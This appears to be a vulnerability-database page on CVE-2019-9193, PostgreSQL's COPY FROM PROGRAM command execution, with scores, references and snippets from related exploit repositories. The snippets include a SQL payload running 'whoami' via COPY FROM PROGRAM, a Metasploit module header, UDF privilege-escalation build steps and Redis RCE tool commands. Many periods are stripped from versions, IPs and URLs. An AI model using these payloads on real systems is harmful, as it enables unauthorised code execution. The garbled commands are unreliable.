Published: 01/04/2019 Updated: 11/04/2024

CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8

CVSS v3 Base Score: 7.2 | Impact Score: 5.9 | Exploitability Score: 1.2

VMScore: 908

Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

In PostgreSQL 9.3 up to and including 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.

Vulnerable Product	Search on Vulmon	Subscribe to Product
postgresql postgresql

Impact: Important Public Date: 2019-03-20 CWE: CWE-20 Bugzilla: 1695982: CVE-2019-9193 postgresql: Comm ...

\## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core/exploit/postgres' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres include Msf::Exploit::Remote::Tcp include Msf::Auxil ...

PostgreSQL Remote Code Executuon

CVE-2019-9193 • CVE-2019-9193 취약점 PostgreSQL은 “COPY TO / FROM PROGRAM” 의 기능을 통해 DB의 운영체제 내에서 임의의 코드를 실행할 수 있는 취약점 공격 vector는 “SuperUser”와 “pg_execute_server_program” 그룹의 User가 해당

CVE-2019–9193 - PostgreSQL 961 Remote Code Execution (Authenticated) Proof of Concept PostgreSQL Database from version 961 are vulnerable to Authenticated Remote Code Execution Even if it isn't considered to be a vulnerability itself by the development team, this could be leveraged to gain access to a misconfigured system Help Menu Exploitation example Refe

postgres_copy 脚本说明： CVE-2019-9193 postgres数据库的copy函数导致的命令执行漏洞漏洞版本 93 <= postgres version <= 112 从版本93开始，Postgres新增了一个“COPY TO/FROM PROGRAM”功能。这个功能简单来说就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令

PostgreSQL 提权辅助脚本

使用以 PostgreSQL 1112 为例 # 找相应的 dev 扩展包 apt-get search postgresql-server-dev # 安装 dev 扩展包 apt-get install postgresql-server-dev-11 # 编译好 so 文件 git clone githubcom/No-Github/postgresql_udf_help cd postgresql_udf_help gcc -Wall -I/usr/include/postgresql/11/server -Os -shared lib_postgresqludf_sysc -fPIC -o lib_postgresqludf_

一款用Go语言编写的数据库自动化提权工具，支持Mysql、MSSQL、Postgresql、Oracle、Redis数据库提权、命令执行、爆破以及ssh连接

Redis 连接redis获取sql shell go run \maingo -redis -rhost 192168111211 -rport 6379 -cli 主从复制RCE //Linux go run \maingo -redis -rhost 192168111211 -lhost 1921681110 -exec -so expso go run \maingo -redis -rhost 192168111211 -lhost 1921681110 -exec -console -so expso

PostgreSQL Remote Code Executuon

CVE-2019-9193 • CVE-2019-9193 취약점 PostgreSQL은 “COPY TO / FROM PROGRAM” 의 기능을 통해 DB의 운영체제 내에서 임의의 코드를 실행할 수 있는 취약점 공격 vector는 “SuperUser”와 “pg_execute_server_program” 그룹의 User가 해당

Finally got tired of writing the same payloads over and over again.

payloads Finally got tired of writing the same payloads over and over again Postgres 93 > Latest Command Execution: CVE-2019-9193 Data Exfil via COPY FROM PROGARM and SELECT DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGARM 'whoami'; SELECT * FROM cmd_exec; Reverse Shell v

if DNS hangs on kali,use this tofix service networking restart ssh pattern for some machines ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" learner@1921685052 Info gathering Domain Registrar whois offensive-securitycom -h 192168210251

CVE-2019–9193 - PostgreSQL 9.3-12.3 Authenticated Remote Code Execution

CVE-2019–9193 - PostgreSQL 93-123 Authenticated Remote Code Execution Proof of Concept PostgreSQL Database from version 93 to 123 (latest tested) are vulnerable to Authenticated Remote Code Execution Even if it isn't considered to be a vulnerability itself by the development team, this could be leveraged to gain access to a misconfigured system Help Menu Expl

CWE-78 https://paquier.xyz/postgresql-2/postgres-9-3-feature-highlight-copy-tofrom-program/https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/authenticated-arbitrary-command-execution-on-postgresql-9-3/https://blog.hagander.net/when-a-vulnerability-is-not-a-vulnerability-244/https://security.netapp.com/advisory/ntap-20190502-0003/http://packetstormsecurity.com/files/152757/PostgreSQL-COPY-FROM-PROGRAM-Command-Execution.html http://packetstormsecurity.com/files/166540/PostgreSQL-11.7-Remote-Code-Execution.html http://packetstormsecurity.com/files/171722/PostgreSQL-9.6.1-Remote-Code-Execution.html https://nvd.nist.gov https://www.exploit-db.com/exploits/46813 https://github.com/skyship36/CVE-2019-9193 https://meterpreter.org/cve-2019-9193-postgresql-arbitrary-code-execution/https://access.redhat.com/security/cve/cve-2019-9193

CVE-2019-9193

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Exploits

Github Repositories

References

Vulmon Search

About

Products

Connect